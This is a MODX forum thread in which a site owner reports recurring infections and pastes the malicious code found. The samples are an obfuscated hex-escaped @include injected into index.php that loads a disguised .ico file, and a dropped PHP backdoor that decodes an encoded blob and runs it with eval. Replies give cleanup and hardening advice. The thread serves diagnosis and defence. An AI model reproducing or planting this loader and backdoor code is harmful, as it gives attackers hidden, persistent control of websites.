We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 52615
    • 10 Posts
    After hours and hours of reading and trial and error I'm out of options.

    Installation info:

    • MODX version: 2.6.1
    • PHP version: 5.6.33
    • DB info: mysql, version: 10.0.29-MariaDB-cll-lve

    My MODX installations keeps getting compromised.
    Malicious code is injected in certain index.php files. Example:

    /*3e166*/
    
    @include "\x2fho\x6de/\x64eb\x3950\x391/\x64om\x61in\x73/m\x69dd\x65lb\x75rg\x67ez\x69ch\x74va\x6ede\x73ta\x64.n\x6c/p\x75bl\x69c_\x68tm\x6c/a\x73se\x74s/\x63om\x70on\x65nt\x73/r\x65ca\x70tc\x68av\x32/f\x61vi\x63on\x5f20\x324c\x36.i\x63o";
    
    /*3e166*/
    


    The includes are referring to ICO files, which contain scrambled code.

    Besides this, the hack also creates new, random, files, like:
    ucwuwapz.php
    footer21.php
    vexwzlkn.php

    Contents of footer21.php (similar to the other files):
    <?php //000310
    if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');$__id = realpath('extension_dir');$__here = dirname(__FILE__);if (strlen($__id) > 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0x99d-0x4ed)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;
    
    ?>
    2473S6D9I7X66E568X20S3d2041Z7D2726179S2827776V8C7a7Oa746dI2V73d3e277aL6Ga6T1
    65H6H8O64T272D9D3b2472T6Lc64O772G0H3GdH20417L27A26A1792W82T7N686Pf7979H2N73
    DdT3e2E76dF6Xe6D7706fC272M93b666Hf72K65P6Q1636Q82028T41727S261I7M92824736J9
    7U66A5Q6U82Ec20245LfQ504Wf5354K2c2024L7Q2Y6c6477D2c20R2S45f43B4VfC4fO4Eb494
    52S920P617Y3A20247275Z7475D2W9207Pb6B66VfD7B26H56R163Y682V02M82N4727T57P4I7
    G520K6P1732L02479666bW6Y5W6Bf203d3e2024V646R8X6I776R2L92L0M7Mb24646O8X6776C
    2C0Q3Vd2Q040F70L6163X6b28T22T4W8Z2aU222XcW2B02464686B776293Db24Y796N66b6G56
    fP202e3dS2K022S32L663430Q3E861G63632dU626566612Td3432X3C733G2dT393P038642Rd
    N3F5U63I3A833V33W6D5Z62663534N35O31223b24H657Va6bD6aJ78203Fd2G0W24646867F7S
    6F205e2O07T37S56N27374A7P22T8B7374V72O5f7Y2S6C5V706561C742824M79Q6H66b656f2
    BcN202V873M7472L6c65U6e28X24646867O7629202f2073747B26Hc656e2H8E2H4Z796F6D6b
    G65C6f29Q29V2A02Gb2D0I312Z9Z2c2T0302c20737L472U6c6E56e28A24H646V8M6N776292N
    93bW24L657a6b6aD78D20W3dX206578706cB6Lf64652P8E2D223222Vc2Q024X657a6PbR6aI7
    829G3bM69662028B6B36Uf75B6Ie7428W24U6K5M7a6NbU6a78Z29203Fd3dJ20P332Z920W7b6
    5D76A61S6cE28C24657DaN6b6a785Hb3W15dO28F2P4Y657a6bM6aU78B5bX325d292V9M3b657
    O8J6974O282J93bV7dA7d7d
    


    Another practical problem is that MODX sites that are infected, will stop working after a while.

    I did all the standard stuff and followed the excellent guide at https://forums.modx.com/thread/94643/how-to-clean-up-your-hacked-webspace


    • Checked for malicious plugins/users
    • Changed all passwords, form MODX users to DirectAdmin/FTP/DB
    • Moved the website to a new hosting account
    • Used the guide mentioned earlier to identify malicious includes via SSH

    Unfortunately this will only temporarily remove the infection.
    Right now the only thing I can do is running a cronjob that removes all unwanted ICO files form my host every hour...

    I'm not sure if this is a specific MODX related infection. The truth is that only MODX-installations are affected right now.

    Is there someone who experienced the same problems and found a solution? Any advice is welcome!

    Thanks in advance.. [ed. note: hartmanrik last edited this post 6 years, 1 month ago.]
      • 38783
      • 571 Posts
      I think it would be a good idea to notify the MODX Security team about this:

      https://develop.modx.com/contribute/security/report/

        If I help you out on these forums I would be very grateful if you would consider rating me on Trustpilot: https://uk.trustpilot.com/review/andytough.com

        email: [email protected] | website: https://andytough.com
        • 38783
        • 571 Posts
        Is is possible that the sites were initially infected whilst running MODX 2.5.1 or below?
          If I help you out on these forums I would be very grateful if you would consider rating me on Trustpilot: https://uk.trustpilot.com/review/andytough.com

          email: [email protected] | website: https://andytough.com
          • 52615
          • 10 Posts
          Quote from: andytough at Feb 26, 2018, 11:48 AM
          Is is possible that the sites were initially infected whilst running MODX 2.5.1 or below?

          Thats certainly possible and most likely the case!

            • 52615
            • 10 Posts
            Quote from: andytough at Feb 26, 2018, 11:47 AM
            I think it would be a good idea to notify the MODX Security team about this:

            https://develop.modx.com/contribute/security/report/


            Thnx for the advice, I filed a report!
              • 38783
              • 571 Posts
              This will not help with a site that is already compromised but there is some good advice here:

              https://docs.modx.com/revolution/2.x/administering-your-site/security/hardening-modx-revolution
                If I help you out on these forums I would be very grateful if you would consider rating me on Trustpilot: https://uk.trustpilot.com/review/andytough.com

                email: [email protected] | website: https://andytough.com
              • Quote from: andytough at Feb 26, 2018, 11:47 AM
                I think it would be a good idea to notify the MODX Security team about this:

                https://develop.modx.com/contribute/security/report/


                The security team is not meant for "my site keeps getting hacked, please help me fix it" but for "here is a specific security issue that I want to disclose responsibly" type situations. Keep in mind MODX is predominantly a volunteer-run project.

                Commercial support can be found at https://modx.com/services/ and other sources.

                It sounds like the attacker managed to put in a backdoor somewhere allowing them to come back after you've cleaned up. You'll need to track that down and close that. It can be easier to wipe the server clean and to start installing things from scratch (reviewing EVERYTHING that you copy/paste/import) to eliminate some random file tucked away being the source.

                Also, if it's happening often enough that you've set up an hourly cron job to clean things up, chances are that you can pinpoint the source/backdoor through server logs.
                  Mark Hamstra • Developer spending his days working on Premium Extras and a MODX Site Dashboard with the ability to remotely upgrade MODX and extras to make the MODX world a little better.

                  Tweet me @mark_hamstra, check my infrequent blog at markhamstra.com, my slightly more frequent ramblings at MODX.today or see code at Github.
                  • 38783
                  • 571 Posts
                  The security team is not meant for "my site keeps getting hacked, please help me fix it" but for "here is a specific security issue that I want to disclose responsibly" type situations. Keep in mind MODX is predominantly a volunteer-run project.

                  Sorry Mark. I was just concerned in case there might have been some new vulnerability in play.
                    If I help you out on these forums I would be very grateful if you would consider rating me on Trustpilot: https://uk.trustpilot.com/review/andytough.com

                    email: [email protected] | website: https://andytough.com
                  • @hartmanrik we received your email, however, for issues where your site has been hacked, the best place to send a message is to [email protected].

                    The hack you report is almost certainly the one closed in 2.2.15/16 and most of these sites were initially compromised quite some time ago however we've seen many sites reinfected and more deeply. It can be extremely difficult to clean these sites. In addition, in the last 6 months, we've also seen the site_content table get altered on some compromises.

                    Send in a report and we'll let you know the options. [ed. note: smashingred last edited this post 6 years, 1 month ago.]
                      Author of zero books. Formerly of many strange things. Pairs well with meats. Conversations are magical experiences. He's dangerous around code but a markup magician. BlogTwitterLinkedInGitHub
                    • Quote from: andytough at Feb 26, 2018, 12:35 PM

                      Sorry Mark. I was just concerned in case there might have been some new vulnerability in play.

                      The symptoms reported are identical to the compromise of sites at or below 2.2.15. Many sites became compromised within a year of the exploit being released. Unfortunately, despite repeated pleas, emails, social media posts and security reminders, people for one reason or another do not keep their MODX sites abreast of current versions. The exploits are growing deeper and more harmful yet we continue to see people with sites running 2.2.8 and etc.

                      If a site is running 2.2.15 or below, it should be assumed that it's compromised with both backdoors, plugins, snippets and malicious users, in addition, it's likely that originally legitimate users have had their passwords changed to allow for undetected access. I've seen lots of Manager Logs that indicate that in many cases attackers are, in fact, logging in, if they have good enough access to do things like send email or mine bitcoin (which is something we're seeing happen now).
                        Author of zero books. Formerly of many strange things. Pairs well with meats. Conversations are magical experiences. He's dangerous around code but a markup magician. BlogTwitterLinkedInGitHub